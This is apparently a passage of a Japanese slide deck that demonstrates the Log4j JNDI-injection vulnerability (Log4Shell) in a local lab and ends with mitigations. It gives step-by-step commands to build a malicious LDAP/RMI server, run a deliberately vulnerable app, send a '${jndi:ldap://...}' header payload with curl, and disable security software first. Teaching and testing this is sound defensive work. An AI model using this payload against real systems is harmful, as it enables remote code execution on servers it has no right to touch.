POC検証 ⚠注意事項 試す際は危険に晒されてもいい個人のPCを準備した上で、 ローカル環境での検証用としてお使いください!
12.
POC検証 ■今回の検証環境 ・Windows10 home (GitBash上でのコマンド実行) ・Java
JDK8
13.
POC検証:STEP1 悪意のあるLDAP/RMI/WEBサーバ、脆弱性を含むJavaアプリ準備 # 作業ディレクトリに移動(例) cd /d/git/java/log4j-vulnarability #
悪意のあるLDAP/RMI/WEBサーバ git clone https://github.com/pimps/JNDI-Exploit-Kit.git # 脆弱性を含むJavaアプリ git clone https://github.com/tutttuwi/JNDI-Injection-Target-App.git
14.
POC検証:STEP2 アプリ起動 # 悪意のあるLDAP/RMI/WEBサーバのディレクトリに移動 cd JNDI-Exploit-Kit #
ビルド実行 ※エラーが発生する場合はJDK環境やネットワーク環境を見直す bash gradlew build # 悪意のあるサーバの起動 (実行コマンドは calc を指定) java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -L 127.0.0.1:1389 -J 127.0.0.1:9090 -R 127.0.0.1:1099 -C 'calc' # 脆弱性を含むJavaアプリディレクトリに移動 cd JNDI-Injection-Target-App # ビルド実行 ※エラーが発生する場合はJDK環境やネットワーク環境を見直す bash gradlew build # 脆弱性を含むJavaアプリ起動 ※補足:システムプロパティ[com.sun.jndi.ldap.object.trustURLCodebase]をtrueにしておく java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar build/libs/JNDI-Injection-Target-App-0.0.1- SNAPSHOT.jar <前提条件> ローカル環境で起動しているセキュリティソフトを一時的に無効化しておくこと ネットワーク攻撃/ボット攻撃への保護機能(IDSなど)が動いていると確認ができない ローカル環境にJavaがインストールされていること
15.
POC検証:STEP3 脆弱性を含むJavaアプリへリクエストの送信 # 脆弱性を含むJavaアプリへリクエスト送信 # 形式:curl
[localip:port] -H '[HederName]: ${jndi:[TargetEnvironmentURL]}' curl 127.0.0.1:8080/jndi-targetapp/info -H 'X-Api-Version: ${jndi:ldap://127.0.0.1:1389/istruy}' # ▶ここでは悪意のあるサーバ起動時に出力された以下のldapサーバのURLを指定 Target environment(Build in JDK 1.8 whose trustURLCodebase is true): rmi://127.0.0.1:1099/istruy ldap://127.0.0.1:1389/istruy
16.
POC検証:実行キャプチャ 悪意のあるリクエスト実行前
17.
POC検証:実行キャプチャ 悪意のあるリクエスト実行後
18.
実行処理解説:悪意のあるWebアプリ アプリ起動 - ServerStart.javaのmainメソッド内でJetty/Ldap/Rmiサーバを起動 - LDAPサーバ:LDAPRefServer.javaのrunメソッドを参照 -
RMIサーバ:RMIRefServer.javaのrunメソッドを参照 - JETTYサーバ:JettyServer.javaを参照 - LdapサーバでJettyサーバのURLが返却された際に、脆弱性のあるWebアプリからdoGetメソッドが呼び出され、対 象のJavaクラスが返却される - Transformers.java - src/main/resources/template直下に格納されているクラスファイルに、以下のコードを埋め込み、Jettyサーバで返却 できるようにしている <リポジトリ> https://github1s.com/pimps/JNDI-Exploit-Kit
19.
実行処理解説:悪意のあるWebアプリ staticブロックに先ほどのコードが 差し込まれたJavaCodeを脆弱性の あるWebアプリがダウンロードし てしまうため、 OSコマンドが実行されてしまう
20.
実行処理解説:脆弱性のあるWebアプリ log4jの脆弱性対象ライブラリーを 意図的に使用
21.
実行処理解説:脆弱性のあるWebアプリ コントローラーの設定 - ヘッダー文字列をLog4j2ライブラリでログ出力する - ※システムプロパティはSpringBoot起動後に変更できないので設定しても意味がないためコメントアウトで 残しています。
22.
本脆弱性を防ぐには (2021/12/27時点のApacheページより) 恒久対応 - log4j2ライブラリーのバージョンアップ - java8
の場合、Apache Log4j 2.17.0を利用する - java7 の場合、Apache Log4j 2.12.3を利用する※java7用に個別対応している - java6 の場合、Apache Log4j 2.3.1を利用する 暫定対応 - JndiLookup クラスをクラスパスから削除する。 - zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
Download now